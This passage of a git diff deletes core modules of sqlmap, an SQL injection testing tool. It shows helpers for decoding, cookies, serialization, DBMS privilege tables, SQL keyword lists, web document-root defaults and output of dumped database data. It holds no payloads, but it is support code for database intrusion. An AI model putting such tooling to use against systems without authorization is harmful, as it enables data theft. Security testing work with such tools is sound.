possible forms - """ - - class _(StringIO): - def __init__(self, content, url): - StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content) - self._url = url - def geturl(self): - return self._url - - if not content: - errMsg = "can't parse forms as the page content appears to be blank" - if raise_: - raise SqlmapGenericException(errMsg) - else: - logger.debug(errMsg) - - forms = None - retVal = set() - response = _(content, url) - - try: - forms = ParseResponse(response, backwards_compat=False) - except (UnicodeError, ValueError): - pass - except ParseError: - if ">> getHostHeader('http://www.target.com/vuln.php?id=1') - 'www.target.com' - """ - - retVal = url - - if url: - retVal = urlparse.urlparse(url).netloc - - if re.search("http(s)?://\[.+\]", url, re.I): - retVal = extractRegexResult("http(s)?://\[(?P.+)\]", url) - elif any(retVal.endswith(':%d' % _) for _ in (80, 443)): - retVal = retVal.split(':')[0] - - return retVal - -def checkDeprecatedOptions(args): - """ - Checks for deprecated options - """ - - for _ in args: - if _ in DEPRECATED_OPTIONS: - errMsg = "switch/option '%s' is deprecated" % _ - if DEPRECATED_OPTIONS[_]: - errMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_] - raise SqlmapSyntaxException(errMsg) - -def checkSystemEncoding(): - """ - Checks for problematic encodings - """ - - if sys.getdefaultencoding() == "cp720": - try: - codecs.lookup("cp720") - except LookupError: - errMsg = "there is a known Python issue (#1616979) related " - errMsg += "to support for charset 'cp720'. 
Please visit " - errMsg += "'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' " - errMsg += "and follow the instructions to be able to fix it" - logger.critical(errMsg) - - warnMsg = "temporary switching to charset 'cp1256'" - logger.warn(warnMsg) - - reload(sys) - sys.setdefaultencoding("cp1256") - -def evaluateCode(code, variables=None): - """ - Executes given python code given in a string form - """ - - try: - exec(code, variables) - except KeyboardInterrupt: - raise - except Exception, ex: - errMsg = "an error occurred while evaluating provided code ('%s') " % getSafeExString(ex) - raise SqlmapGenericException(errMsg) - -def serializeObject(object_): - """ - Serializes given object - """ - - return base64pickle(object_) - -def unserializeObject(value): - """ - Unserializes object from given serialized form - - >>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3] - True - """ - - return base64unpickle(value) if value else None - -def resetCounter(technique): - """ - Resets query counter for a given technique - """ - - kb.counters[technique] = 0 - -def incrementCounter(technique): - """ - Increments query counter for a given technique - """ - - kb.counters[technique] = getCounter(technique) + 1 - -def getCounter(technique): - """ - Returns query counter for a given technique - """ - - return kb.counters.get(technique, 0) - -def applyFunctionRecursively(value, function): - """ - Applies function recursively through list-like structures - - >>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0) - [True, True, [True, True, [True]], False] - """ - - if isListLike(value): - retVal = [applyFunctionRecursively(_, function) for _ in value] - else: - retVal = function(value) - - return retVal - -def decodeHexValue(value, raw=False): - """ - Returns value decoded from DBMS specific hexadecimal representation - - >>> decodeHexValue('3132332031') - u'123 1' - """ - - retVal = value - - def _(value): - retVal = value - if 
value and isinstance(value, basestring): - if len(value) % 2 != 0: - retVal = "%s?" % hexdecode(value[:-1]) - singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) - else: - retVal = hexdecode(value) - - if not kb.binaryField and not raw: - if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"): - try: - retVal = retVal.decode("utf-16-le") - except UnicodeDecodeError: - pass - elif Backend.isDbms(DBMS.HSQLDB): - try: - retVal = retVal.decode("utf-16-be") - except UnicodeDecodeError: - pass - if not isinstance(retVal, unicode): - retVal = getUnicode(retVal, "utf8") - - return retVal - - try: - retVal = applyFunctionRecursively(value, _) - except: - singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value) - - return retVal - -def extractExpectedValue(value, expected): - """ - Extracts and returns expected value by a given type - - >>> extractExpectedValue(['1'], EXPECTED.BOOL) - True - >>> extractExpectedValue('1', EXPECTED.INT) - 1 - """ - - if expected: - value = unArrayizeValue(value) - - if isNoneValue(value): - value = None - elif expected == EXPECTED.BOOL: - if isinstance(value, int): - value = bool(value) - elif isinstance(value, basestring): - value = value.strip().lower() - if value in ("true", "false"): - value = value == "true" - elif value in ("1", "-1"): - value = True - elif value == "0": - value = False - else: - value = None - elif expected == EXPECTED.INT: - if isinstance(value, basestring): - value = int(value) if value.isdigit() else None - - return value - -def hashDBWrite(key, value, serialize=False): - """ - Helper function for writing session data to HashDB - """ - - _ = "%s%s%s" % (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - conf.hashDB.write(_, value, serialize) - -def hashDBRetrieve(key, unserialize=False, checkConf=False): - """ - Helper function for restoring session data from HashDB - """ - - _ = "%s%s%s" 
% (conf.url or "%s%s" % (conf.hostname, conf.port), key, HASHDB_MILESTONE_VALUE) - retVal = conf.hashDB.retrieve(_, unserialize) if kb.resumeValues and not (checkConf and any((conf.flushSession, conf.freshQueries))) else None - if not kb.inferenceMode and not kb.fileReadMode and isinstance(retVal, basestring) and any(_ in retVal for _ in (PARTIAL_VALUE_MARKER, PARTIAL_HEX_VALUE_MARKER)): - retVal = None - return retVal - -def resetCookieJar(cookieJar): - """ - Cleans cookies from a given cookie jar - """ - - if not conf.loadCookies: - cookieJar.clear() - else: - try: - if not cookieJar.filename: - infoMsg = "loading cookies from '%s'" % conf.loadCookies - logger.info(infoMsg) - - content = readCachedFileContent(conf.loadCookies) - lines = filter(None, (line.strip() for line in content.split("\n") if not line.startswith('#'))) - handle, filename = tempfile.mkstemp(prefix="sqlmapcj-") - os.close(handle) - - # Reference: http://www.hashbangcode.com/blog/netscape-http-cooke-file-parser-php-584.html - with openFile(filename, "w+b") as f: - f.write("%s\n" % NETSCAPE_FORMAT_HEADER_COOKIES) - for line in lines: - _ = line.split("\t") - if len(_) == 7: - _[4] = FORCE_COOKIE_EXPIRATION_TIME - f.write("\n%s" % "\t".join(_)) - - cookieJar.filename = filename - - cookieJar.load(cookieJar.filename, ignore_expires=True) - - for cookie in cookieJar: - if cookie.expires < time.time(): - warnMsg = "cookie '%s' has expired" % cookie - singleTimeWarnMessage(warnMsg) - - cookieJar.clear_expired_cookies() - - if not cookieJar._cookies: - errMsg = "no valid cookies found" - raise SqlmapGenericException(errMsg) - - except cookielib.LoadError, msg: - errMsg = "there was a problem loading " - errMsg += "cookies file ('%s')" % re.sub(r"(cookies) file '[^']+'", "\g<1>", str(msg)) - raise SqlmapGenericException(errMsg) - -def decloakToTemp(filename): - """ - Decloaks content of a given file to a temporary file with similar name and extension - """ - - content = decloak(filename) - - _ = 
utf8encode(os.path.split(filename[:-1])[-1]) - - prefix, suffix = os.path.splitext(_) - prefix = prefix.split(os.extsep)[0] - - handle, filename = tempfile.mkstemp(prefix=prefix, suffix=suffix) - os.close(handle) - - with open(filename, "w+b") as f: - f.write(content) - - return filename - -def prioritySortColumns(columns): - """ - Sorts given column names by length in ascending order while those containing - string 'id' go first - - >>> prioritySortColumns(['password', 'userid', 'name']) - ['userid', 'name', 'password'] - """ - - _ = lambda x: x and "id" in x.lower() - return sorted(sorted(columns, key=len), lambda x, y: -1 if _(x) and not _(y) else 1 if not _(x) and _(y) else 0) - -def getRequestHeader(request, name): - """ - Solving an issue with an urllib2 Request header case sensitivity - - Reference: http://bugs.python.org/issue2275 - """ - - retVal = None - if request and name: - retVal = max(value if name.upper() == key.upper() else None for key, value in request.header_items()) - return retVal - -def isNumber(value): - """ - Returns True if the given value is a number-like object - - >>> isNumber(1) - True - >>> isNumber('0') - True - >>> isNumber('foobar') - False - """ - - try: - float(value) - except: - return False - else: - return True - -def zeroDepthSearch(expression, value): - """ - Searches occurrences of value inside expression at 0-depth level - regarding the parentheses - """ - - retVal = [] - - depth = 0 - for index in xrange(len(expression)): - if expression[index] == '(': - depth += 1 - elif expression[index] == ')': - depth -= 1 - elif depth == 0 and expression[index:index + len(value)] == value: - retVal.append(index) - - return retVal - -def splitFields(fields, delimiter=','): - """ - Returns list of (0-depth) fields splitted by delimiter - - >>> splitFields('foo, bar, max(foo, bar)') - ['foo', 'bar', 'max(foo,bar)'] - """ - - fields = fields.replace("%s " % delimiter, delimiter) - commas = [-1, len(fields)] - 
commas.extend(zeroDepthSearch(fields, ',')) - commas = sorted(commas) - - return [fields[x + 1:y] for (x, y) in zip(commas, commas[1:])] - -def pollProcess(process, suppress_errors=False): - """ - Checks for process status (prints . if still running) - """ - - while True: - dataToStdout(".") - time.sleep(1) - - returncode = process.poll() - - if returncode is not None: - if not suppress_errors: - if returncode == 0: - dataToStdout(" done\n") - elif returncode < 0: - dataToStdout(" process terminated by signal %d\n" % returncode) - elif returncode > 0: - dataToStdout(" quit unexpectedly with return code %d\n" % returncode) - - break - -def getSafeExString(ex, encoding=None): - """ - Safe way how to get the proper exception represtation as a string - (Note: errors to be avoided: 1) "%s" % Exception(u'\u0161') and 2) "%s" % str(Exception(u'\u0161')) - """ - - retVal = ex - - if getattr(ex, "message", None): - retVal = ex.message - elif getattr(ex, "msg", None): - retVal = ex.msg - - return getUnicode(retVal, encoding=encoding) diff --git a/lib/core/convert.py b/lib/core/convert.py deleted file mode 100644 index dbcbb233..00000000 --- a/lib/core/convert.py +++ /dev/null @@ -1,220 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import base64 -import json -import pickle -import re -import StringIO -import sys -import types - -from lib.core.settings import IS_WIN -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import PICKLE_REDUCE_WHITELIST - -def base64decode(value): - """ - Decodes string value from Base64 to plain format - - >>> base64decode('Zm9vYmFy') - 'foobar' - """ - - return base64.b64decode(value) - -def base64encode(value): - """ - Encodes string value from plain to Base64 format - - >>> base64encode('foobar') - 'Zm9vYmFy' - """ - - return base64.b64encode(value) - -def base64pickle(value): - """ - Serializes (with pickle) and 
encodes to Base64 format supplied (binary) value - - >>> base64pickle('foobar') - 'gAJVBmZvb2JhcnEALg==' - """ - - retVal = None - - try: - retVal = base64encode(pickle.dumps(value, pickle.HIGHEST_PROTOCOL)) - except: - warnMsg = "problem occurred while serializing " - warnMsg += "instance of a type '%s'" % type(value) - singleTimeWarnMessage(warnMsg) - - try: - retVal = base64encode(pickle.dumps(value)) - except: - retVal = base64encode(pickle.dumps(str(value), pickle.HIGHEST_PROTOCOL)) - - return retVal - -def base64unpickle(value): - """ - Decodes value from Base64 to plain format and deserializes (with pickle) its content - - >>> base64unpickle('gAJVBmZvb2JhcnEALg==') - 'foobar' - """ - - retVal = None - - def _(self): - if len(self.stack) > 1: - func = self.stack[-2] - if func not in PICKLE_REDUCE_WHITELIST: - raise Exception, "abusing reduce() is bad, Mkay!" - self.load_reduce() - - def loads(str): - file = StringIO.StringIO(str) - unpickler = pickle.Unpickler(file) - unpickler.dispatch[pickle.REDUCE] = _ - return unpickler.load() - - try: - retVal = loads(base64decode(value)) - except TypeError: - retVal = loads(base64decode(bytes(value))) - - return retVal - -def hexdecode(value): - """ - Decodes string value from hex to plain format - - >>> hexdecode('666f6f626172') - 'foobar' - """ - - value = value.lower() - return (value[2:] if value.startswith("0x") else value).decode("hex") - -def hexencode(value): - """ - Encodes string value from plain to hex format - - >>> hexencode('foobar') - '666f6f626172' - """ - - return utf8encode(value).encode("hex") - -def unicodeencode(value, encoding=None): - """ - Returns 8-bit string representation of the supplied unicode value - - >>> unicodeencode(u'foobar') - 'foobar' - """ - - retVal = value - if isinstance(value, unicode): - try: - retVal = value.encode(encoding or UNICODE_ENCODING) - except UnicodeEncodeError: - retVal = value.encode(UNICODE_ENCODING, "replace") - return retVal - -def utf8encode(value): - """ - 
Returns 8-bit string representation of the supplied UTF-8 value - - >>> utf8encode(u'foobar') - 'foobar' - """ - - return unicodeencode(value, "utf-8") - -def utf8decode(value): - """ - Returns UTF-8 representation of the supplied 8-bit string representation - - >>> utf8decode('foobar') - u'foobar' - """ - - return value.decode("utf-8") - -def htmlunescape(value): - """ - Returns (basic conversion) HTML unescaped value - - >>> htmlunescape('a<b') - 'a'), ('"', '"'), (' ', ' '), ('&', '&')) - retVal = reduce(lambda x, y: x.replace(y[0], y[1]), codes, retVal) - try: - retVal = re.sub(r"&#x([^;]+);", lambda match: unichr(int(match.group(1), 16)), retVal) - except ValueError: - pass - return retVal - -def singleTimeWarnMessage(message): # Cross-linked function - sys.stdout.write(message) - sys.stdout.write("\n") - sys.stdout.flush() - -def stdoutencode(data): - retVal = None - - try: - data = data or "" - - # Reference: http://bugs.python.org/issue1602 - if IS_WIN: - output = data.encode(sys.stdout.encoding, "replace") - - if '?' in output and '?' not in data: - warnMsg = "cannot properly display Unicode characters " - warnMsg += "inside Windows OS command prompt " - warnMsg += "(http://bugs.python.org/issue1602). All " - warnMsg += "unhandled occurances will result in " - warnMsg += "replacement with '?' character. Please, find " - warnMsg += "proper character representation inside " - warnMsg += "corresponding output files. 
" - singleTimeWarnMessage(warnMsg) - - retVal = output - else: - retVal = data.encode(sys.stdout.encoding) - except: - retVal = data.encode(UNICODE_ENCODING) if isinstance(data, unicode) else data - - return retVal - -def jsonize(data): - """ - Returns JSON serialized data - - >>> jsonize({'foo':'bar'}) - '{\\n "foo": "bar"\\n}' - """ - - return json.dumps(data, sort_keys=False, indent=4) - -def dejsonize(data): - """ - Returns JSON deserialized data - - >>> dejsonize('{\\n "foo": "bar"\\n}') - {u'foo': u'bar'} - """ - - return json.loads(data) diff --git a/lib/core/data.py b/lib/core/data.py deleted file mode 100644 index 6197d6b7..00000000 --- a/lib/core/data.py +++ /dev/null @@ -1,31 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.datatype import AttribDict -from lib.core.log import LOGGER - -# sqlmap paths -paths = AttribDict() - -# object to store original command line options -cmdLineOptions = AttribDict() - -# object to store merged options (command line, configuration file and default options) -mergedOptions = AttribDict() - -# object to share within function and classes command -# line options and settings -conf = AttribDict() - -# object to share within function and classes results -kb = AttribDict() - -# object with each database management system specific queries -queries = {} - -# logger -logger = LOGGER diff --git a/lib/core/datatype.py b/lib/core/datatype.py deleted file mode 100644 index 182abe31..00000000 --- a/lib/core/datatype.py +++ /dev/null @@ -1,107 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -import copy -import types - -from lib.core.exception import SqlmapDataException - -class AttribDict(dict): - """ - This class defines the sqlmap object, inheriting from Python data - type dictionary. 
- - >>> foo = AttribDict() - >>> foo.bar = 1 - >>> foo.bar - 1 - """ - - def __init__(self, indict=None, attribute=None): - if indict is None: - indict = {} - - # Set any attributes here - before initialisation - # these remain as normal attributes - self.attribute = attribute - dict.__init__(self, indict) - self.__initialised = True - - # After initialisation, setting attributes - # is the same as setting an item - - def __getattr__(self, item): - """ - Maps values to attributes - Only called if there *is NOT* an attribute with this name - """ - - try: - return self.__getitem__(item) - except KeyError: - raise SqlmapDataException("unable to access item '%s'" % item) - - def __setattr__(self, item, value): - """ - Maps attributes to values - Only if we are initialised - """ - - # This test allows attributes to be set in the __init__ method - if "_AttribDict__initialised" not in self.__dict__: - return dict.__setattr__(self, item, value) - - # Any normal attributes are handled normally - elif item in self.__dict__: - dict.__setattr__(self, item, value) - - else: - self.__setitem__(item, value) - - def __getstate__(self): - return self.__dict__ - - def __setstate__(self, dict): - self.__dict__ = dict - - def __deepcopy__(self, memo): - retVal = self.__class__() - memo[id(self)] = retVal - - for attr in dir(self): - if not attr.startswith('_'): - value = getattr(self, attr) - if not isinstance(value, (types.BuiltinFunctionType, types.FunctionType, types.MethodType)): - setattr(retVal, attr, copy.deepcopy(value, memo)) - - for key, value in self.items(): - retVal.__setitem__(key, copy.deepcopy(value, memo)) - - return retVal - -class InjectionDict(AttribDict): - def __init__(self): - AttribDict.__init__(self) - - self.place = None - self.parameter = None - self.ptype = None - self.prefix = None - self.suffix = None - self.clause = None - - # data is a dict with various stype, each which is a dict with - # all the information specific for that stype - self.data = 
AttribDict() - - # conf is a dict which stores current snapshot of important - # options used during detection - self.conf = AttribDict() - - self.dbms = None - self.dbms_version = None - self.os = None diff --git a/lib/core/decorators.py b/lib/core/decorators.py deleted file mode 100644 index 93019ad8..00000000 --- a/lib/core/decorators.py +++ /dev/null @@ -1,24 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -def cachedmethod(f, cache={}): - """ - Method with a cached content - - Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ - """ - - def _(*args, **kwargs): - try: - key = (f, tuple(args), frozenset(kwargs.items())) - except: - key = "".join(str(_) for _ in (f, args, kwargs)) - if key not in cache: - cache[key] = f(*args, **kwargs) - return cache[key] - - return _ diff --git a/lib/core/defaults.py b/lib/core/defaults.py deleted file mode 100644 index 99674aa1..00000000 --- a/lib/core/defaults.py +++ /dev/null @@ -1,28 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.datatype import AttribDict - -_defaults = { - "csvDel": ",", - "timeSec": 5, - "googlePage": 1, - "cpuThrottle": 5, - "verbose": 1, - "delay": 0, - "timeout": 30, - "retries": 3, - "saFreq": 0, - "threads": 1, - "level": 1, - "risk": 1, - "dumpFormat": "CSV", - "tech": "BEUSTQ", - "torType": "HTTP", -} - -defaults = AttribDict(_defaults) diff --git a/lib/core/dicts.py b/lib/core/dicts.py deleted file mode 100644 index b896ed81..00000000 --- a/lib/core/dicts.py +++ /dev/null @@ -1,239 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -from lib.core.enums import DBMS -from lib.core.enums import OS -from lib.core.enums import 
POST_HINT -from lib.core.settings import BLANK -from lib.core.settings import NULL -from lib.core.settings import MSSQL_ALIASES -from lib.core.settings import MYSQL_ALIASES -from lib.core.settings import PGSQL_ALIASES -from lib.core.settings import ORACLE_ALIASES -from lib.core.settings import SQLITE_ALIASES -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import MAXDB_ALIASES -from lib.core.settings import SYBASE_ALIASES -from lib.core.settings import DB2_ALIASES -from lib.core.settings import HSQLDB_ALIASES - -FIREBIRD_TYPES = { - 261: "BLOB", - 14: "CHAR", - 40: "CSTRING", - 11: "D_FLOAT", - 27: "DOUBLE", - 10: "FLOAT", - 16: "INT64", - 8: "INTEGER", - 9: "QUAD", - 7: "SMALLINT", - 12: "DATE", - 13: "TIME", - 35: "TIMESTAMP", - 37: "VARCHAR", - } - -SYBASE_TYPES = { - 14: "floatn", - 8: "float", - 15: "datetimn", - 12: "datetime", - 23: "real", - 28: "numericn", - 10: "numeric", - 27: "decimaln", - 26: "decimal", - 17: "moneyn", - 11: "money", - 21: "smallmoney", - 22: "smalldatetime", - 13: "intn", - 7: "int", - 6: "smallint", - 5: "tinyint", - 16: "bit", - 2: "varchar", - 18: "sysname", - 25: "nvarchar", - 1: "char", - 24: "nchar", - 4: "varbinary", - 80: "timestamp", - 3: "binary", - 19: "text", - 20: "image", - } - -MYSQL_PRIVS = { - 1: "select_priv", - 2: "insert_priv", - 3: "update_priv", - 4: "delete_priv", - 5: "create_priv", - 6: "drop_priv", - 7: "reload_priv", - 8: "shutdown_priv", - 9: "process_priv", - 10: "file_priv", - 11: "grant_priv", - 12: "references_priv", - 13: "index_priv", - 14: "alter_priv", - 15: "show_db_priv", - 16: "super_priv", - 17: "create_tmp_table_priv", - 18: "lock_tables_priv", - 19: "execute_priv", - 20: "repl_slave_priv", - 21: "repl_client_priv", - 22: "create_view_priv", - 23: "show_view_priv", - 24: "create_routine_priv", - 25: "alter_routine_priv", - 26: "create_user_priv", - } - -PGSQL_PRIVS = { - 1: "createdb", - 2: "super", - 3: "catupd", - } - -# 
Reference(s): http://stackoverflow.com/a/17672504 -# http://docwiki.embarcadero.com/InterBase/XE7/en/RDB$USER_PRIVILEGES - -FIREBIRD_PRIVS = { - "S": "SELECT", - "I": "INSERT", - "U": "UPDATE", - "D": "DELETE", - "R": "REFERENCE", - "E": "EXECUTE", - "X": "EXECUTE", - "A": "ALL", - "M": "MEMBER", - "T": "DECRYPT", - "E": "ENCRYPT", - "B": "SUBSCRIBE", - } - -DB2_PRIVS = { - 1: "CONTROLAUTH", - 2: "ALTERAUTH", - 3: "DELETEAUTH", - 4: "INDEXAUTH", - 5: "INSERTAUTH", - 6: "REFAUTH", - 7: "SELECTAUTH", - 8: "UPDATEAUTH", - } - -DUMP_REPLACEMENTS = {" ": NULL, "": BLANK} - -DBMS_DICT = { - DBMS.MSSQL: (MSSQL_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "mssql+pymssql"), - DBMS.MYSQL: (MYSQL_ALIASES, "python pymysql", "https://github.com/petehunt/PyMySQL/", "mysql"), - DBMS.PGSQL: (PGSQL_ALIASES, "python-psycopg2", "http://initd.org/psycopg/", "postgresql"), - DBMS.ORACLE: (ORACLE_ALIASES, "python cx_Oracle", "http://cx-oracle.sourceforge.net/", "oracle"), - DBMS.SQLITE: (SQLITE_ALIASES, "python-sqlite", "http://packages.ubuntu.com/quantal/python-sqlite", "sqlite"), - DBMS.ACCESS: (ACCESS_ALIASES, "python-pyodbc", "http://pyodbc.googlecode.com/", "access"), - DBMS.FIREBIRD: (FIREBIRD_ALIASES, "python-kinterbasdb", "http://kinterbasdb.sourceforge.net/", "firebird"), - DBMS.MAXDB: (MAXDB_ALIASES, None, None, "maxdb"), - DBMS.SYBASE: (SYBASE_ALIASES, "python-pymssql", "http://pymssql.sourceforge.net/", "sybase"), - DBMS.DB2: (DB2_ALIASES, "python ibm-db", "http://code.google.com/p/ibm-db/", "ibm_db_sa"), - DBMS.HSQLDB: (HSQLDB_ALIASES, "python jaydebeapi & python-jpype", "https://pypi.python.org/pypi/JayDeBeApi/ & http://jpype.sourceforge.net/", None), - } - -FROM_DUMMY_TABLE = { - DBMS.ORACLE: " FROM DUAL", - DBMS.ACCESS: " FROM MSysAccessObjects", - DBMS.FIREBIRD: " FROM RDB$DATABASE", - DBMS.MAXDB: " FROM VERSIONS", - DBMS.DB2: " FROM SYSIBM.SYSDUMMY1", - DBMS.HSQLDB: " FROM INFORMATION_SCHEMA.SYSTEM_USERS" - } - -SQL_STATEMENTS = { - "SQL SELECT 
statement": ( - "select ", - "show ", - " top ", - " distinct ", - " from ", - " from dual", - " where ", - " group by ", - " order by ", - " having ", - " limit ", - " offset ", - " union all ", - " rownum as ", - "(case ", ), - - "SQL data definition": ( - "create ", - "declare ", - "drop ", - "truncate ", - "alter ", ), - - "SQL data manipulation": ( - "bulk ", - "insert ", - "update ", - "delete ", - "merge ", - "load ", ), - - "SQL data control": ( - "grant ", - "revoke ", ), - - "SQL data execution": ( - "exec ", - "execute ", - "values ", - "call ", ), - - "SQL transaction": ( - "start transaction ", - "begin work ", - "begin transaction ", - "commit ", - "rollback ", ), - } - -POST_HINT_CONTENT_TYPES = { - POST_HINT.JSON: "application/json", - POST_HINT.JSON_LIKE: "application/json", - POST_HINT.MULTIPART: "multipart/form-data", - POST_HINT.SOAP: "application/soap+xml", - POST_HINT.XML: "application/xml", - POST_HINT.ARRAY_LIKE: "application/x-www-form-urlencoded; charset=utf-8", - } - -DEPRECATED_OPTIONS = { - "--replicate": "use '--dump-format=SQLITE' instead", - "--no-unescape": "use '--no-escape' instead", - "--binary": "use '--binary-fields' instead", - "--auth-private": "use '--auth-file' instead", - "--check-payload": None, - "--check-waf": None, - } - -DUMP_DATA_PREPROCESS = { - DBMS.ORACLE: {"XMLTYPE": "(%s).getStringVal()"}, # Reference: https://www.tibcommunity.com/docs/DOC-3643 - DBMS.MSSQL: {"IMAGE": "CONVERT(VARBINARY(MAX),%s)"}, - } - -DEFAULT_DOC_ROOTS = { - OS.WINDOWS: ("C:/xampp/htdocs/", "C:/Inetpub/wwwroot/"), - OS.LINUX: ("/var/www/", "/var/www/html", "/usr/local/apache2/htdocs", "/var/www/nginx-default") # Reference: https://wiki.apache.org/httpd/DistrosDefaultLayout - } diff --git a/lib/core/dump.py b/lib/core/dump.py deleted file mode 100644 index e56defdd..00000000 --- a/lib/core/dump.py +++ /dev/null @@ -1,690 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2016 sqlmap developers (http://sqlmap.org/) -See the file 
'doc/COPYING' for copying permission -""" - -import cgi -import hashlib -import os -import re -import tempfile -import threading - -from lib.core.common import Backend -from lib.core.common import dataToDumpFile -from lib.core.common import dataToStdout -from lib.core.common import getSafeExString -from lib.core.common import getUnicode -from lib.core.common import isListLike -from lib.core.common import normalizeUnicode -from lib.core.common import openFile -from lib.core.common import prioritySortColumns -from lib.core.common import randomInt -from lib.core.common import safeCSValue -from lib.core.common import unicodeencode -from lib.core.common import unsafeSQLIdentificatorNaming -from lib.core.data import conf -from lib.core.data import kb -from lib.core.data import logger -from lib.core.dicts import DUMP_REPLACEMENTS -from lib.core.enums import CONTENT_STATUS -from lib.core.enums import CONTENT_TYPE -from lib.core.enums import DBMS -from lib.core.enums import DUMP_FORMAT -from lib.core.exception import SqlmapGenericException -from lib.core.exception import SqlmapValueException -from lib.core.exception import SqlmapSystemException -from lib.core.replication import Replication -from lib.core.settings import DUMP_FILE_BUFFER_SIZE -from lib.core.settings import HTML_DUMP_CSS_STYLE -from lib.core.settings import IS_WIN -from lib.core.settings import METADB_SUFFIX -from lib.core.settings import MIN_BINARY_DISK_DUMP_SIZE -from lib.core.settings import TRIM_STDOUT_DUMP_SIZE -from lib.core.settings import UNICODE_ENCODING -from lib.core.settings import WINDOWS_RESERVED_NAMES -from thirdparty.magic import magic - -from extra.safe2bin.safe2bin import safechardecode - -class Dump(object): - """ - This class defines methods used to parse and output the results - of SQL injection actions - """ - - def __init__(self): - self._outputFile = None - self._outputFP = None - self._lock = threading.Lock() - - def _write(self, data, newline=True, console=True, content_type=None): - 
if hasattr(conf, "api"): - dataToStdout(data, content_type=content_type, status=CONTENT_STATUS.COMPLETE) - return - - text = "%s%s" % (data, "\n" if newline else " ") - - if console: - dataToStdout(text) - - if kb.get("multiThreadMode"): - self._lock.acquire() - - try: - self._outputFP.write(text) - except IOError, ex: - errMsg = "error occurred while writing to log file ('%s')" % getSafeExString(ex) - raise SqlmapGenericException(errMsg) - - if kb.get("multiThreadMode"): - self._lock.release() - - kb.dataOutputFlag = True - - def flush(self): - if self._outputFP: - try: - self._outputFP.flush() - except IOError: - pass - - def setOutputFile(self): - self._outputFile = os.path.join(conf.outputPath, "log") - try: - self._outputFP = openFile(self._outputFile, "ab" if not conf.flushSession else "wb") - except IOError, ex: - errMsg = "error occurred while opening log file ('%s')" % getSafeExString(ex) - raise SqlmapGenericException(errMsg) - - def getOutputFile(self): - return self._outputFile - - def singleString(self, data, content_type=None): - self._write(data, content_type=content_type) - - def string(self, header, data, content_type=None, sort=True): - kb.stickyLevel = None - - if hasattr(conf, "api"): - self._write(data, content_type=content_type) - return - - if isListLike(data): - self.lister(header, data, content_type, sort) - elif data is not None: - _ = getUnicode(data) - - if _ and _[-1] == '\n': - _ = _[:-1] - - if "\n" in _: - self._write("%s:\n---\n%s\n---" % (header, _)) - else: - self._write("%s: %s" % (header, ("'%s'" % _) if isinstance(data, basestring) else _)) - else: - self._write("%s:\tNone" % header) - - def lister(self, header, elements, content_type=None, sort=True): - if elements and sort: - try: - elements = set(elements) - elements = list(elements) - elements.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - except: - pass - - if hasattr(conf, "api"): - self._write(elements, content_type=content_type) - return - - if 
elements: - self._write("%s [%d]:" % (header, len(elements))) - - for element in elements: - if isinstance(element, basestring): - self._write("[*] %s" % element) - elif isListLike(element): - self._write("[*] " + ", ".join(getUnicode(e) for e in element)) - - if elements: - self._write("") - - def banner(self, data): - self.string("banner", data, content_type=CONTENT_TYPE.BANNER) - - def currentUser(self, data): - self.string("current user", data, content_type=CONTENT_TYPE.CURRENT_USER) - - def currentDb(self, data): - if Backend.isDbms(DBMS.MAXDB): - self.string("current database (no practical usage on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.PGSQL, DBMS.HSQLDB): - self.string("current schema (equivalent to database on %s)" % Backend.getIdentifiedDbms(), data, content_type=CONTENT_TYPE.CURRENT_DB) - else: - self.string("current database", data, content_type=CONTENT_TYPE.CURRENT_DB) - - def hostname(self, data): - self.string("hostname", data, content_type=CONTENT_TYPE.HOSTNAME) - - def dba(self, data): - self.string("current user is DBA", data, content_type=CONTENT_TYPE.IS_DBA) - - def users(self, users): - self.lister("database management system users", users, content_type=CONTENT_TYPE.USERS) - - def userSettings(self, header, userSettings, subHeader, content_type=None): - self._areAdmins = set() - - if isinstance(userSettings, (tuple, list, set)): - self._areAdmins = userSettings[1] - userSettings = userSettings[0] - - users = userSettings.keys() - users.sort(key=lambda x: x.lower() if isinstance(x, basestring) else x) - - if hasattr(conf, "api"): - self._write(userSettings, content_type=content_type) - return - - if userSettings: - self._write("%s:" % header) - - for user in users: - settings = userSettings[user] - - if settings is None: - stringSettings = "" - else: - stringSettings = " [%d]:" % len(settings) - - if user in self._areAdmins: - self._write("[*] %s 
